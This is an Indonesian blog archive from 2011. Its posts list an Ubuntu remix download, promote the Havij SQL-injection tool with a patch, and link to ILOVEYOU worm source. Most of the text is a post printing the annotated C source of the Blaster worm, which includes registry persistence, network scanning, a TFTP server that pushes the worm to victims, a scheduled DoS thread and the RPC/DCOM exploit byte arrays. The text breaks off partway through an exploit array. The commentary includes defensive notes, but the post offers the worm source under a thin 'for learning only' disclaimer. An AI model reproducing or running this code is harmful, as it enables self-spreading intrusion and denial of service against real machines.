Pages

27 April 2011

Ubuntu Go! 11.01 ENG/RUS

Ubuntu Go! 11.01 ENG/RUS | 2.3GB
Architecture: x86
License: Freeware
Language: English / Russian
Super-fast and great-looking, Ubuntu is a secure, intuitive operating system that powers desktops, servers, netbooks and laptops. Ubuntu is, and always will be, absolutely free.

Features of Release :
  • The assembly includes all the latest updates of Ubuntu on 29 January 2011
  • Installed the kernel 6.2.1937-enabled Physical Address Extension (PAE), the kernel patched "200 Interline patch" that increases the responsiveness of the system.
  • Building has now become a multilingual, English and Russian languages ??are installed completely.
  • Set a default theme Orta and the package of icons Faenza. Added a dark theme Atolm.
  • Replaced the wallpaper.
  • Added Appendix Ubuntu Go! Apps, which will help you install the necessary software and drivers without Internet access.
  • Ubuntu Go! Apps includes the following drivers for video card: Ati Catalyst 10.10 (with full support vSync), Ati Catalyst 10.12, Nvidia linux display driver 260.19.29, all the drivers patched for the new kernel
Installation :
Before installing, be sure to disconnect the Internet. After the installation is successful, and the desktop appears, insert the media Ubuntu Go! 1.11 to install additional programs by Ubuntu Go! Apps.
To work with the stick Ubuntu Go! Apps, change volume label stick on UBUNTUGO

Note :
After installing the software and drivers in Ubuntu Go! Apps, should run in a terminal sudo apt-get update
For installation in VirtualBox, do not forget to include in setting up the support PAE. Otherwise, the system will not boot.
  • Added Appendix Ubuntu Tweak
  • Module installed Adobe Flash.
  • Installed the package ubuntu-restricted-extras which contains the codecs, flash, java, fonts windows.
  • Added package Madwimax, to work with wimax modems.
Ext. Information :
  • The disc contains a local repository.
  • Supported the installation of flash drives. Added program UNetbootin v.494 which will help you make a bootable USB flash drive.
  • Reviewed the original installer ubuntu.
Download :
http://www.filesonic.com/file/349875364/Ubuntu.Go.11.01.ENG.RUS.part01.rar
http://www.filesonic.com/file/349875424/Ubuntu.Go.11.01.ENG.RUS.part02.rar
http://www.filesonic.com/file/349875394/Ubuntu.Go.11.01.ENG.RUS.part03.rar
http://www.filesonic.com/file/349878144/Ubuntu.Go.11.01.ENG.RUS.part04.rar
http://www.filesonic.com/file/349878524/Ubuntu.Go.11.01.ENG.RUS.part05.rar
http://www.filesonic.com/file/349878184/Ubuntu.Go.11.01.ENG.RUS.part06.rar
http://www.filesonic.com/file/349878454/Ubuntu.Go.11.01.ENG.RUS.part07.rar
http://www.filesonic.com/file/349878534/Ubuntu.Go.11.01.ENG.RUS.part08.rar
http://www.filesonic.com/file/349878084/Ubuntu.Go.11.01.ENG.RUS.part09.rar
http://www.filesonic.com/file/349878314/Ubuntu.Go.11.01.ENG.RUS.part10.rar
http://www.filesonic.com/file/349878544/Ubuntu.Go.11.01.ENG.RUS.part11.rar
http://www.filesonic.com/file/349878634/Ubuntu.Go.11.01.ENG.RUS.part12.rar
http://www.filesonic.com/file/349878464/Ubuntu.Go.11.01.ENG.RUS.part13.rar
http://www.filesonic.com/file/349878284/Ubuntu.Go.11.01.ENG.RUS.part14.rar
http://www.filesonic.com/file/349875684/Ubuntu.Go.11.01.ENG.RUS.part15.rar
http://www.filesonic.com/file/349878044/Ubuntu.Go.11.01.ENG.RUS.part16.rar
http://www.filesonic.com/file/349878654/Ubuntu.Go.11.01.ENG.RUS.part17.rar
http://www.filesonic.com/file/349878104/Ubuntu.Go.11.01.ENG.RUS.part18.rar
http://www.filesonic.com/file/349878234/Ubuntu.Go.11.01.ENG.RUS.part19.rar
http://www.filesonic.com/file/349878774/Ubuntu.Go.11.01.ENG.RUS.part20.rar
http://www.filesonic.com/file/349878554/Ubuntu.Go.11.01.ENG.RUS.part21.rar
http://www.filesonic.com/file/349878264/Ubuntu.Go.11.01.ENG.RUS.part22.rar
http://www.filesonic.com/file/349864154/Ubuntu.Go.11.01.ENG.RUS.part23.rar
Baca Selengkapnya... Ubuntu Go! 11.01 ENG/RUS

26 April 2011

Havij 1.14 + Patch

Havij adalah salah satu dari sekian banyak tools yang biasa digunakan para LAMERS termasuk SAYA SENDIRI untuk melakukan aksi SQL Injection.

segitu ajah yah penjelasannya :p malas gw ngetik panjang² :p

Baca Selengkapnya... Havij 1.14 + Patch

25 April 2011

Source code Love Letter Worm (I LOVE YOU)

ILOVEYOU, juga dikenal sebagai Loveletter merupakan worm komputer yang berhasil menyerang puluhan juta komputer Windows pada tahun 2000 ketika ia dikirim sebagai lampiran melalui sebuah pesan email dengan teks subjek "ILOVEYOU"

Worm ini diperkirakan tiba di inbox email pada tanggal 4 Mei 2000 dengan subjek sederhana "ILOVEYOU" dan lampiran "LOVE-LETTER-FOR-YOU.TXT.vbs".

Ekstensi 'vbs' pada lampiran tersebut terhidden secara default, yang menyebabkan pengguna email lengah dan berpikir bahwa file itu adalah sebuah file teks biasa. Setelah membuka lampiran, worm tersebut mengirimkan salinan dirinya ke semua orang di Windows Address Book dan dengan alamat pengirim pengguna. Hal ini juga membuat sejumlah perubahan berbahaya untuk sistem pengguna.

Berikut source code dari worm ini :
http://pastebin.com/VXJNyQKv

Untuk penjelasan lebih lanjut dari worm ini dapat anda baca pada referensi :
http://www.cert.org/advisories/CA-2000-04.html
http://www.econmr.org/datapool/page/30/virus.pdf
http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.87.8077&rep=rep1&type=pdf
Baca Selengkapnya... Source code Love Letter Worm (I LOVE YOU)

Source Code WORM W32/Blaster

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Pertidak Pertanggungjawaban :

  • Saya tidak bertanggung atas penyalahgunaan source code ini
  • Postingan ini hanya untuk pembelajaran saja, jadi tolong jangan di salah gunakan
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



Worm Blaster atau biasa juga dikenal dengan sebutan Lovsan, Lovesan atau MSBlast adalah worm komputer yang menyebar pada komputer yang berjalan pada sistem operasi Microsoft: Windows XP dan Windows 2000, pada bulan Agustus tahun 2003.

Breikut skema penyebaran worm ini





Berikut Source code nya :
#include 
#include    /*IP_HDRINCL*/
#include     /*InternetGetConnectedState*/
#include 

#pragma comment (lib, "ws2_32.lib")
#pragma comment (lib, "wininet.lib")
#pragma comment (lib, "advapi32.lib")


/*
 * These strings aren't used in the worm, Buford put them here
 * so that whitehat researchers would discover them.
 */
const char msg1[]="I just want to say LOVE YOU SAN!!";
const char msg2[]="billy gates why do you make this possible ?"
                  " Stop making money and fix your software!!";


/*
 * Buford probably put the worm name as a "define" at the top
 * of his program so that he could change the name at any time.
 * 2003-09-29: This is the string that Parson changed.
 */
#define MSBLAST_EXE "msblast.exe"

/*
 * MS-RPC/DCOM runs over port 135.
 * DEFENSE: firewalling port 135 will prevent systems from
 * being exploited and will hinder the spread of this worm.
 */
#define MSRCP_PORT_135 135

/*
 * The TFTP protocol is defined to run on port 69. Once this
 * worm breaks into a victim, it will command it to download
 * the worm via TFTP. Therefore, the worms briefly runs a
 * TFTP service to deliver that file.
 * DEFENSE: firewalling 69/udp will prevent the worm from
 * fully infected a host.
 */
#define TFTP_PORT_69    69

/*
 * The shell-prompt is established over port 4444. The 
 * exploit code (in the variable 'sc') commands the victim
 * to "bind a shell" on this port. The exploit then connects
 * to that port to send commands, such as TFTPing the 
 * msblast.exe file down and launching it.
 * DEFENSE: firewalling 4444/tcp will prevent the worm from
 * spreading.
 */
#define SHELL_PORT_4444 4444


/*
 * A simple string to hold the current IP address
 */
char target_ip_string[16];

/*
 * A global variable to hold the socket for the TFTP service.
 */
int fd_tftp_service;

/* 
 * Global flag to indicate this thread is running. This
 * is set when the thread starts, then is cleared when
 * the thread is about to end.
 * This demonstrates that Buford isn't confident with
 * multi-threaded programming -- he should just check
 * the thread handle.
 */
int is_tftp_running;

/* 
*  When delivering the worm file to the victim, it gets the
 * name by querying itself using GetModuleFilename(). This
 * makes it easier to change the filename or to launch the
 * worm. */
char msblast_filename[256+4];

int ClassD, ClassC, ClassB, ClassA;

int local_class_a, local_class_b;

int winxp1_or_win2k2;


ULONG WINAPI blaster_DoS_thread(LPVOID);
void blaster_spreader();
void blaster_exploit_target(int fd, const char *victim_ip);
void blaster_send_syn_packet(int target_ip, int fd);


/***************************************************************  
 * This is where the 'msblast.exe' program starts running
 ***************************************************************/
void main(int argc, char *argv[]) 
{ 
    WSADATA WSAData;     
    char myhostname[512]; 
    char daystring[3];
    char monthstring[3];     
    HKEY hKey;
    int ThreadId;
    register unsigned long scan_local=0;     

    /*
     * Create a registry key that will cause this worm
     * to run every time the system restarts.
     * DEFENSE: Slammer was "memory-resident" and could
     * be cleaned by simply rebooting the machine.
     * Cleaning this worm requires this registry entry
     * to be deleted.
     */
    RegCreateKeyEx(
        /*hKey*/        HKEY_LOCAL_MACHINE,  
        /*lpSubKey*/    "SOFTWARE\\Microsoft\\Windows\\"
                        "CurrentVersion\\Run",
        /*Reserved*/    0,
        /*lpClass*/     NULL,
        /*dwOptions*/   REG_OPTION_NON_VOLATILE,
        /*samDesired */ KEY_ALL_ACCESS,
        /*lpSecurityAttributes*/ NULL, 
        /*phkResult */  &hKey,
        /*lpdwDisposition */ 0);
    RegSetValueExA(
        hKey, 
        "windows auto update", 
        0, 
        REG_SZ,  
        MSBLAST_EXE,     
        50);
    RegCloseKey(hKey); 


    /*
     * Make sure this isn't a second infection. A common problem
     * with worms is that they sometimes re-infect the same
     * victim repeatedly, eventually crashing it. A crashed  
     * system cannot spread the worm. Therefore, worm writers
     * now make sure to prevent reinfections. The way Blaster
     * does this is by creating a system "global" object called
     * "BILLY". If another program in the computer has already
     * created "BILLY", then this instance won't run.
     * DEFENSE: this implies that you can remove Blaster by  
     * creating a mutex named "BILLY". When the computer     
     * restarts, Blaster will falsely believe that it has
     * already infected the system and will quit. 
     */
    CreateMutexA(NULL, TRUE, "BILLY"); 
    if (GetLastError() == ERROR_ALREADY_EXISTS)
        ExitProcess(0);  

    /*
     * Windows systems requires "WinSock" (the network API layer)
     * to be initialized. Note that the SYNflood attack requires
     * raw sockets to be initialized, which only works in
     * version 2.2 of WinSock.
     * BUFORD: The following initialization is needlessly
     * complicated, and is typical of programmers who are unsure
     * of their knowledge of sockets..
     */
    if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0
        && WSAStartup(MAKEWORD(1,1), &WSAData) != 0
        && WSAStartup(1, &WSAData) != 0)
        return;

    /*
     * The worm needs to read itself from the disk when  
     * transferring to the victim. Rather than using a hard-coded
     * location, it discovered the location of itself dynamically
     * through this function call. This has the side effect of
     * making it easier to change the name of the worm, as well
     * as making it easier to launch it.
     */
   GetModuleFileNameA(NULL, msblast_filename,
                                    sizeof(msblast_filename)); 

   /*
    * When the worm infects a dialup machine, every time the user
    * restarts their machine, the worm's network communication
    * will cause annoying 'dial' popups for the user. This will
    * make them suspect their machine is infected.
    * The function call below makes sure that the worm only
    * starts running once the connection to the Internet
    * has been established and not before.
    * BUFORD: I think Buford tested out his code on a machine
    * and discovered this problem. Even though much of the
    * code indicates he didn't spend much time on
    * testing his worm, this line indicates that he did
    * at least a little bit of testing.
    */
    while (!InternetGetConnectedState(&ThreadId, 0))
        Sleep (20000); /*wait 20 seconds and try again */

    /*
     * Initialize the low-order byte of target IP address to 0.
     */
    ClassD = 0;

    /*
     * The worm must make decisions "randomly": each worm must
     * choose different systems to infect. In order to make
     * random choices, the programmer must "seed" the random
     * number generator. The typical way to do this is by
     * seeding it with the current timestamp.
     * BUFORD: Later in this code you'll find that Buford calls
     * 'srand()' many times to reseed. This is largely
     * unnecessary, and again indicates that Buford is not 
     * confident in his programming skills, so he constantly
     * reseeds the generator in order to make extra sure he
     * has gotten it right.
     */
    srand(GetTickCount()); 

    /*
     * This initializes the "local" network to some random
     * value. The code below will attempt to figure out what
     * the true local network is -- but just in case it fails,
     * the initialization fails, using random values makes sure
     * the worm won't do something stupid, such as scan the
     * network around 0.0.0.0
     */
    local_class_a = (rand() % 254)+1; 
    local_class_b = (rand() % 254)+1; 

    /*
     * This discovers the local IP address used currently by this
     * victim machine. Blaster randomly chooses to either infect
     * just the local ClassB network, or some other network,
     * therefore it needs to know the local network.
     * BUFORD: The worm writer uses a complex way to print out

     * the IP address into a string, then parse it back again
     * to a number. This demonstrates that Buford is fairly
     * new to C programming: he thinks in terms of the printed
     * representation of the IP address rather than in its
     * binary form.
     */
    if (gethostname(myhostname, sizeof(myhostname)) != -1) {
        HOSTENT *p_hostent = gethostbyname(myhostname);

        if (p_hostent != NULL && p_hostent->h_addr != NULL) {
            struct in_addr in; 
            const char *p_addr_item;

            memcpy(&in, p_hostent->h_addr, sizeof(in));
            sprintf(myhostname, "%s", inet_ntoa(in)); 
             
            p_addr_item = strtok(myhostname, ".");
            ClassA = atoi(p_addr_item);  
             
            p_addr_item = strtok(0, ".");
            ClassB = atoi(p_addr_item);
             
            p_addr_item = strtok(0, ".");
            ClassC = atoi(p_addr_item);
             
            if (ClassC > 20) { 
                /* When starting from victim's address range, 
                 * try to start a little bit behind. This is
                 * important because the scanning logic only
                 * move forward. */
                srand(GetTickCount()); 
                ClassC -= (rand() % 20);     
            } 
            local_class_a = ClassA;  
            local_class_b = ClassB;  
            scan_local = TRUE; 
        }
    }
   

    /*
     * This chooses whether Blaster will scan just the local
     * network (40% chance) or a random network (60% chance)
     */
    srand(GetTickCount()); 
    if ((rand() % 20) < 12)  
        scan_local = FALSE;

    /*
     * The known exploits require the hacker to indicate whether     
     * the victim is WinXP or Win2k. The worm has to guess. The
     * way it guesses is that it chooses randomly. 80% of the time
     * it will assume that all victims are WinXP, and 20% of the
     * time it will assume all victims are Win2k. This means that
     * propogation among Win2k machines will be slowed down by
     * the fact Win2k machines are getting DoSed faster than they
     * are getting exploited. 
     */
    winxp1_or_win2k2 = 1; 
    if ((rand()%10) > 7)     
        winxp1_or_win2k2 = 2; 
     
    /*
     * If not scanning locally, then choose a random IP address
     * to start with.
     * BUG: this worm choose bad ranges above 224. This will     
     * cause a bunch of unnecessary multicast traffic. Weird
     * multicast traffic has historically been an easy way of 
     * detecting worm activity.
     */
    if (!scan_local) { 
        ClassA = (rand() % 254)+1; 
        ClassB = (rand() % 254);     
        ClassC = (rand() % 254);     
    }


    /*
     * Check the date so that when in the certain range, it will     
     * trigger a DoS attack against Micosoft. The following
     * times will trigger the DoS attack:
     *  Aug 16 through Aug 31
     *  Spt 16 through Spt 30
     *  Oct 16 through Oct 31
     *  Nov 16 through Nov 30
     *  Dec 16 through Dec 31
     * This applies to all years, and is based on local time.
     * FAQ: The worm is based on "local", not "global" time.
     * That means the DoS attack will start from Japan,
     * then Asia, then Europe, then the United States as the
     * time moves across the globe.
     */
#define MYLANG      MAKELANGID(LANG_ENGLISH, SUBLANG_DEFAULT)
#define LOCALE_409  MAKELCID(MYLANG, SORT_DEFAULT)
    GetDateFormat(  LOCALE_409,  
                    0,       
                    NULL, /*localtime, not GMT*/     
                    "d",     
                    daystring, 
                    sizeof(daystring));  
    GetDateFormat(  LOCALE_409,  
                    0, 
                    NULL, /*localtime, not GMT*/     
                    "M",     
                    monthstring,     
                    sizeof(monthstring));
    if (atoi(daystring) > 15 && atoi(monthstring) > 8)
        CreateThread(NULL, 0, 
                    blaster_DoS_thread,  
                    0, 0, &ThreadId); 
     
    /*
     * As the final task of the program, go into worm mode
     * trying to infect systems.
     */
    for (;;)
        blaster_spreader();

    /*
     * It'll never reach this point, but in theory, you need a
     * WSACleanup() after a WSAStartup().

     */
    WSACleanup();
} 



/*
 * This will be called from CreateThread in the main worm body
 * right after it connects to port 4444. After the thread is     
 * started, it then sends the string "
 * tftp -i %d.%d.%d.%d GET msblast.exe" (where the %ds represents
 * the IP address of the attacker).
 * Once it sends the string, it then waits for 20 seconds for the
 * TFTP server to end. If the TFTP server doesn't end, it calls
 * TerminateThread.
 */
DWORD WINAPI blaster_tftp_thread(LPVOID p)
{
    /*
     * This is the protocol format of a TFTP packet. This isn't
     * used in the code -- I just provide it here for reference
     */
    struct TFTP_Packet
    {
        short opcode;
        short block_id;
        char data[512];
    };

    char reqbuf[512];           /* request packet buffer */
    struct sockaddr_in server;  /* server-side port number */
    struct sockaddr_in client;  /* client IP address and port */
    int sizeof_client;          /* size of the client structure*/
    char rspbuf[512];           /* response packet */

    static int fd;              /* the socket for the server*/
    register FILE *fp;
    register block_id;
    register int block_size;

    /* Set a flag indicating this thread is running. The other 
     * thread will check this for 20 seconds to see if the TFTP
     * service is still alive. If this thread is still alive in
     * 20 seconds, it will be killed.
     */
    is_tftp_running = TRUE; /*1 == TRUE*/
     
    /* Create a server-socket to listen for UDP requests on */
    fd = socket(AF_INET, SOCK_DGRAM, 0);
    if (fd == SOCKET_ERROR)
        goto closesocket_and_exit;

    /* Bind the socket to 69/udp */
    memset(&server, 0, sizeof(server));
    server.sin_family = AF_INET;
    server.sin_port = htons(TFTP_PORT_69);    
    server.sin_addr.s_addr = 0;     /*TFTP server addr = */
    if (bind(fd, (struct sockaddr*)&server, sizeof(server)) != 0)
        goto closesocket_and_exit;

    /* Receive a packet, any packet. The contents of the received
     * packet are ignored. This means, BTW, that a defensive     
     * "worm-kill" could send a packet from somewhere else. This
     * will cause the TFTP server to download the msblast.exe
     * file to the wrong location, preventing the victim from
     * doing the download. */
    sizeof_client = sizeof(client);
    if (recvfrom(fd, reqbuf, sizeof(reqbuf), 0,  
                (struct sockaddr*)&client, &sizeof_client) <= 0)
        goto closesocket_and_exit;

    /* The TFTP server will respond with many 512 byte blocks
     * until it has completely sent the file; each block must
     * have a unique ID, and each block must be acknowledged.
     * BUFORD: The worm ignores TFTP ACKs. This is probably why
     * the worm restarts the TFTP service rather than leaving it
     * enabled: it essentially flushes all the ACKs from the     
     * the incoming packet queue. If the ACKs aren't flushed,
     * the worm will incorrectly treat them as TFTP requests.
     */
    block_id = 0;

    /* Open this file. GetModuleFilename was used to figure out
     * this filename. */
    fp = fopen(msblast_filename, "rb");
    if (fp == NULL)
        goto closesocket_and_exit;

    /* Continue sending file fragments until none are left */
    for (;;) {
        block_id++;

        /* Build TFTP header */
#define TFTP_OPCODE_DATA 3
        *(short*)(rspbuf+0) = htons(TFTP_OPCODE_DATA);
        *(short*)(rspbuf+2)= htons((short)block_id);

        /* Read next block of data (about 12 blocks total need
         * to be read) */
        block_size = fread(rspbuf+4, 1, 512, fp);
         
        /* Increase the effective length to include the TFTP
         * head built above */
        block_size += 4;

        /* Send this block */
        if (sendto(fd, (char*)&rspbuf, block_size, 
            0, (struct sockaddr*)&client, sizeof_client) <= 0)
            break;

        /* Sleep for a bit.
         * The reason for this is because the worm doesn't care
         * about retransmits -- it therefore must send these     
         * packets slow enough so congestion doesn't drop them.
         * If it misses a packet, then it will DoS the victim
         * without actually infecting it. Worse: the intended
         * victim will continue to send packets, preventing the
         * worm from infecting new systems because the 
         * requests will misdirect TFTP. This design is very
         * bad, and is my bet as the biggest single factor
         * that slows down the worm. */
        Sleep(900);

        /* File transfer ends when the last block is read, which
         * will likely be smaller than a full-sized block*/
        if (block_size != sizeof(rspbuf)) {
            fclose(fp);
            fp = NULL;
            break;
        }
    } 

    if (fp != NULL)
        fclose(fp);

closesocket_and_exit:

    /* Notify that the thread has stopped, so that the waiting 
     * thread can continue on */
    is_tftp_running = FALSE;
    closesocket(fd);
    ExitThread(0);

    return 0;
}




/*
 * This function increments the IP address.  
 * BUFORD: This conversion from numbers, to strings, then back
 * to number is overly complicated. Experienced programmers
 * would simply store the number and increment it. This shows
 * that Buford does not have much experience work with
 * IP addresses.
 */
void blaster_increment_ip_address()
{
    for (;;) {
        if (ClassD <= 254) {
            ClassD++;
            return;
        }

        ClassD = 0;
        ClassC++;
        if (ClassC <= 254)
            return;
        ClassC = 0;
        ClassB++;
        if (ClassB <= 254)
            return;
        ClassB = 0;
        ClassA++;
        if (ClassA <= 254)
            continue;
        ClassA = 0;
        return;
    }
}


/*
 * This is called from the main() function in an
 * infinite loop. It scans the next 20 addresses,
 * then exits.
 */
void blaster_spreader()
{
    fd_set writefds;

    register int i;
    struct sockaddr_in sin;
    struct sockaddr_in peer;
    int sizeof_peer;
    int sockarray[20];
    int opt = 1;
    const char *victim_ip;

    /* Create the beginnings of a "socket-address" structure that
     * will be used repeatedly below on the 'connect()' call for
     * each socket. This structure specified port 135, which is
     * the port used for RPC/DCOM. */
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = htons(MSRCP_PORT_135);

    /* Create an array of 20 socket descriptors */
    for (i=0; i<20; i++) {
        sockarray[i] = socket(AF_INET, SOCK_STREAM, 0);
        if (sockarray[i] == -1)
            return;
        ioctlsocket(sockarray[i], FIONBIO , &opt);
    }

    /* Initiate a "non-blocking" connection on all 20 sockets
     * that were created above.
     * FAQ: Essentially, this means that the worm has 20     
     * "threads" -- even though they aren't true threads.
     */
    for (i=0; i<20; i++) {
        int ip;

        blaster_increment_ip_address();
        sprintf(target_ip_string, "%i.%i.%i.%i",     
                                ClassA, ClassB, ClassC, ClassD);

        ip = inet_addr(target_ip_string);
        if (ip == -1)
            return;
        sin.sin_addr.s_addr = ip;
        connect(sockarray[i],(struct sockaddr*)&sin,sizeof(sin));
    }

    /* Wait 1.8-seconds for a connection.
     * BUG: this is often not enough, especially when a packet
     * is lost due to congestion. A small timeout actually makes
     * the worm slower than faster */
    Sleep(1800);

    /* Now test to see which of those 20 connections succeeded.
     * BUFORD: a more experienced programmer would have done
     * a single 'select()' across all sockets rather than
     * repeated calls for each socket. */
    for (i=0; i<20; i++) {
        struct timeval timeout;
        int nfds;

        timeout.tv_sec = 0;
        timeout.tv_usec = 0;
        nfds = 0;

        FD_ZERO(&writefds);
        FD_SET((unsigned)sockarray[i], &writefds);

        if (select(0, NULL, &writefds, NULL, &timeout) != 1) {
            closesocket(sockarray[i]);
        } else {
            sizeof_peer = sizeof(peer);
            getpeername(sockarray[i],
                    (struct sockaddr*)&peer, &sizeof_peer);  
            victim_ip = inet_ntoa(peer.sin_addr);

            /* If connection succeeds, exploit the victim */
            blaster_exploit_target(sockarray[i], victim_ip);
            closesocket(sockarray[i]);
        }
    }

}

/*
 * This is where the victim is actually exploited. It is the same
 * exploit as created by xfocus and altered by HDMoore.
 * There are a couple of differences. The first is that the in
 * those older exploits, this function itself would create the
 * socket and connect, whereas in Blaster, the socket is already
 * connected to the victim via the scanning function above. The
 * second difference is that the packets/shellcode blocks are
 * declared as stack variables rather than as static globals.
 * Finally, whereas the older exploits give the hacker a     
 * "shell prompt", this one automates usage of the shell-prompt
 * to tell the victim to TFTP the worm down and run it.
 */
void blaster_exploit_target(int sock, const char *victim_ip)
{

/* These blocks of data are just the same ones copied from the
 * xfocus exploit prototype. Whereas the original exploit
 * declared these as "static" variables, Blaster declares
 * these as "stack" variables. This is because the xfocus
 * exploit altered them -- they must be reset back to their
 * original values every time. */
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};



unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
